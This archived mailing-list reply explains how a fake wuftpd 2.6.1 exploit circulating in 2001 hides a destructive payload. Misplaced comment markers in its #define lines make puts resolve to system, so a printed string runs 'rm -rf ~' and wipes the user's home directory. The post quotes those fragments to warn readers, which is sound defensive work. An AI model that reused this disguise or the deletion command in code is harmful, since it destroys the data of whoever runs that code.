Vulnerability Development mailing list archives
Re[2]: wuftpd 2.6.1 advisory/exploit
From: Alexander Ryumshin <mizi () alkar net>
Date: Thu, 20 Sep 2001 15:55:14 +0300
Hello, Yes, the trick is here: //#define POTS 12 /* fill these in for your #define DEF_ALGN 1 * target system //#define HEAP_ADDR 0x41414141 */ ... #define target (unsigned long) ... unsigned long arg_addr = ADDR, align = DEF_ALGN, After preprocessing the code looks like unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system; Then puts' address is being replaced by system's or something like that and then puts("rm -rf is not elite ~"); does the main trick :) Hint: ~ means your home directory. Wednesday, September 19, 2001, 6:38:14 PM, you wrote: BB> Hey, I'm told that this exploit like eats your hard drive or something. BB> Caveat emptor and all, but I figured since I actually heard about this, BB> I'd let you know. I guess it's a spoofed note. BB> BB -- Best regards, Alexander ISP Alkar Teleport tel/fax +380 562 340044 mailto:mizi () alkar net http://abn.com.ua http://ufa.com.ua
Current thread:
- wuftpd 2.6.1 advisory/exploit Carolyn Meinel (Sep 19)
- Re: wuftpd 2.6.1 advisory/exploit Blue Boar (Sep 19)
- Re: wuftpd 2.6.1 advisory/exploit mrcdz (Sep 20)
- Re[2]: wuftpd 2.6.1 advisory/exploit Alexander Ryumshin (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Matias Sedalo (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Blue Boar (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Jason Parker (Sep 20)
- WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit) Pedro Miller Rabinovitch (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Bernhard Rosenkraenzer (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Cade Cairns (Sep 20)
- Re: wuftpd 2.6.1 advisory/exploit Blue Boar (Sep 19)